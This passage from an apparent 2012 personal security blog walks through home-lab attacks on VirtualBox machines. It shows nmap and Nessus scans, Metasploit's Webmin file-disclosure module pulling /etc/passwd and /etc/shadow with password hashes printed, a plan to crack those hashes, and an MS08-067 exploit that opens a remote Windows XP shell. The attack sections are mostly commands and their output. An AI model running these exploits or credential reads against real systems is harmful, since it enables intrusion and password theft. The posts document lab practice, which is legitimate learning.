TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-02-05 00:13:51 UTC-6

TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.0.21

NSE: Script Post-scanning.
Initiating NSE at 17:13
Completed NSE at 17:13, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
yea,, some port that open on system. Any vuln in there? I must run nessus for scanning the vuln.
Image
44 vuln 1 high 4 medium 29 low
high vuln on port 22, I try attack to the port
attack to openssh I failed
try to attack again to port
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285

exploitation to port 10000 with metasploit:

msf > nmap -T4 -Pn -v -A 192.168.0.21
[*] exec: nmap -T4 -Pn -v -A 192.168.0.21


Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-02-04 18:08 WIT
NSE: Loaded 61 scripts for scanning.
Initiating ARP Ping Scan at 18:08
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 18:08, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:09, 13.00s elapsed
Initiating SYN Stealth Scan at 18:09
Scanning 192.168.0.21 [1000 ports]
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 18:09, 0.09s elapsed (1000 total ports)
Initiating Service scan at 18:09
Scanning 5 services on 192.168.0.21
Completed Service scan at 18:09, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
Retrying OS detection (try #2) against 192.168.0.21
Retrying OS detection (try #3) against 192.168.0.21
Retrying OS detection (try #4) against 192.168.0.21
Retrying OS detection (try #5) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.45s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00037s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.51SVN%D=2/4%OT=22%CT=1%CU=36721%PV=Y%DS=1%DC=D%G=Y%M=080027%TM=
OS:4F2D11EF%P=i686-pc-linux-gnu)SEQ(SP=D4%GCD=1%ISR=EF%TI=Z%CI=Z%II=I%TS=7)
OS:OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4
OS:ST11NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)
OS:ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6%
OS:RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.040 days (since Sat Feb 4 17:12:22 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=212 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux

Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Name: MSHOME\Unknown
|_ System time: 2012-02-05 01:09:34 UTC-6

TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.0.21

NSE: Script Post-scanning.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.00s elapsed
Read data files from: /opt/framework/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.82 seconds
Raw packets sent: 1096 (52.018KB) | Rcvd: 1076 (46.598KB)
msf > search webmin

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure


msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no Use a proxy chain
RHOST yes The target address
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port
VHOST no HTTP server virtual host

msf auxiliary(file_disclosure) > set RHOST 192.168.0.21
RHOST => 192.168.0.21
msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
[*] Auxiliary module execution completed
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no Use a proxy chain
RHOST 192.168.0.21 yes The target address
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port
VHOST no HTTP server virtual host

msf auxiliary(file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed

next I crack the password with john the ripper

Kamis, 02 Februari 2012

exploitation windows xp sp3 with SMB vuln

how exploitation windows xp sp3 use backtrack 5 R1? in my article i explore that. my windows xp sp3 installed on my virtualbox, after do everything i check communication my backtrack to windows. i try to ping os on virtualbox;

Currently scanning: 192.168.83.0/16   |   Screen View: Unique Hosts        
                                                                             
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300            
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                
 -----------------------------------------------------------------------------
 192.168.10.1    00:0c:42:e3:89:b1    03    180   Routerboard.com            
 192.168.10.246  08:00:27:a5:ad:44    01    060   CADMUS COMPUTER SYSTEMS    
 192.168.10.251  00:23:8b:e6:02:ee    01    060   Unknown vendor            
 i use netdiscover for see ip connection on my network. ip virtualbox is 192.168.10.246
i ping:

root@cupenk:~# ping 192.168.10.246
PING 192.168.10.246 (192.168.10.246) 56(84) bytes of data.
64 bytes from 192.168.10.246: icmp_seq=1 ttl=128 time=0.455 ms
64 bytes from 192.168.10.246: icmp_seq=2 ttl=128 time=0.469 ms
64 bytes from 192.168.10.246: icmp_seq=3 ttl=128 time=0.423 ms
64 bytes from 192.168.10.246: icmp_seq=4 ttl=128 time=0.483 ms
64 bytes from 192.168.10.246: icmp_seq=5 ttl=128 time=0.307 ms
^C
--- 192.168.10.246 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 0.307/0.427/0.483/0.066 ms
 yeah,, my computer has connected to windows xp on virtualbox
next step i scanning for check openport on windows,,
root@cupenk:~# nmap -T4 -A -v 192.168.10.246

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 20:32 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 20:32
Scanning 192.168.10.246 [1 port]
Completed ARP Ping Scan at 20:32, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:32
Completed Parallel DNS resolution of 1 host. at 20:32, 0.08s elapsed
Initiating SYN Stealth Scan at 20:32
Scanning 192.168.10.246 [1000 ports]
Discovered open port 135/tcp on 192.168.10.246
Discovered open port 139/tcp on 192.168.10.246
Discovered open port 445/tcp on 192.168.10.246
Completed SYN Stealth Scan at 20:32, 1.24s elapsed (1000 total ports)
Initiating Service scan at 20:32
Scanning 3 services on 192.168.10.246
Completed Service scan at 20:32, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.10.246
NSE: Script scanning 192.168.10.246.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.19s elapsed
Nmap scan report for 192.168.10.246
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:A5:AD:44 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: 
|   NetBIOS name: CUP3NK, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a5:ad:44 (Cadmus Computer Systems)
|   Names
|     CUP3NK<00>           Flags: <unique><active>
|     CUP3NK<20>           Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     WORKGROUP<1e>        Flags: <group><active>
|     WORKGROUP<1d>        Flags: <unique><active>
|_    \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: cup3nk
|   NetBIOS computer name: CUP3NK
|   Workgroup: WORKGROUP
|_  System time: 2012-02-03 11:32:58 UTC-8

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.10.246

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
           Raw packets sent: 1103 (49.230KB) | Rcvd: 1017 (41.234KB)

i try to exploitation to windows SMB with metasploit, 
root@cupenk:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.10.246 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|______________________________________________________________________________|



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 798 exploits - 435 auxiliary - 132 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14678 updated today (2012.02.02)

RHOST => 192.168.10.246
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.10.246
[*] Command shell session 1 opened (192.168.10.248:47783 -> 192.168.10.246:4444) at 2012-02-02 20:54:14 +0700

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
 yupp,, i get it i still in windos command :D

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.246
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.1

C:\WINDOWS\system32>

scanning vulnerability windows xp sp3 & ubuntu 10.04 default configuration

in this time i try scanning vuln on windows xp sp3 and ubuntu 10.04, ubuntu and windows no configuration added, all default. i will try use nmap and nessus for scanning.
ubuntu:


Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 15:02 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 15:02
Scanning 192.168.4.43 [1 port]
Completed ARP Ping Scan at 15:02, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:02
Completed Parallel DNS resolution of 1 host. at 15:02, 0.00s elapsed
Initiating SYN Stealth Scan at 15:02
Scanning 192.168.4.43 [1000 ports]
Completed SYN Stealth Scan at 15:02, 0.39s elapsed (1000 total ports)
Initiating Service scan at 15:02
Initiating OS detection (try #1) against 192.168.4.43
Retrying OS detection (try #2) against 192.168.4.43
NSE: Script scanning 192.168.4.43.
Initiating NSE at 15:02
Completed NSE at 15:02, 0.00s elapsed
Nmap scan report for 192.168.4.43
Host is up (0.0044s latency).
All 1000 scanned ports on 192.168.4.43 are closed
MAC Address: 08:00:27:02:B2:23 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   4.38 ms 192.168.4.43

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds
           Raw packets sent: 1013 (45.696KB) | Rcvd: 1013 (41.632KB)

no open port on ubuntu 10.04, now i try scanning windows xp sp3:

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 15:04 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 15:04
Scanning 192.168.4.44 [1 port]
Completed ARP Ping Scan at 15:04, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:04
Completed Parallel DNS resolution of 1 host. at 15:04, 0.00s elapsed
Initiating SYN Stealth Scan at 15:04
Scanning 192.168.4.44 [1000 ports]
Discovered open port 139/tcp on 192.168.4.44
Discovered open port 135/tcp on 192.168.4.44
Discovered open port 445/tcp on 192.168.4.44
Completed SYN Stealth Scan at 15:04, 0.37s elapsed (1000 total ports)
Initiating Service scan at 15:04
Scanning 3 services on 192.168.4.44
Completed Service scan at 15:04, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.4.44
NSE: Script scanning 192.168.4.44.
Initiating NSE at 15:04
Completed NSE at 15:04, 0.15s elapsed
Nmap scan report for 192.168.4.44
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:A5:AD:44 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat:
|   NetBIOS name: CUP3NK, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a5:ad:44 (Cadmus Computer Systems)
|   Names
|     CUP3NK<00>           Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     CUP3NK<20>           Flags: <unique><active>
|_    WORKGROUP<1e>        Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: cup3nk
|   NetBIOS computer name: CUP3NK
|   Workgroup: WORKGROUP
|_  System time: 2012-02-03 06:04:27 UTC-8

TRACEROUTE
HOP RTT     ADDRESS
1   1.46 ms 192.168.4.44

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds
           Raw packets sent: 1017 (45.446KB) | Rcvd: 1017 (41.234KB)
on windows xp sp3 get information open port where many people can attack to this, it is port 445, SMB vuln on windows. now i try get information with nessus:

windows :
on windows i've information that windows vuln on port 445, secuirty risk level is high

on ubuntu i get information some vuln:
but on ubuntu no high risk level vuln:


Rabu, 01 Februari 2012

Installing Nessus

in my article i will explore about installing nessus. nessus is a tools for developing vulnerability searching, you can get it on http://nessus.org/download/. in installation i use backtrack 5R1 Gnome, so that i take deb file.
for installation you can be use command installation deb file " dpkg -i "filename" ". after done install nessus you must adding user for login on nessus tools. on terminal command input [“/opt/nessus/sbin/nessus-adduser”] fill username and password

if your done make user you must register for getting pluggin, register can do on http://www.nessus.org/products/nessus/nessus-homefeed if done you check email for get registration code, if you've got it do terminal command [/opt/nessus/bin/nessus-fetch --register “kode”]  ok wait until done load pluggin. if done do terminal command [/etc/init.d/nessusd start] if done start service [/etc/init.d/nessusd start] if done run browser  https://127.0.0.1:8834/

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Cup3nK - Premium Blogger Themes | Hosted Desktop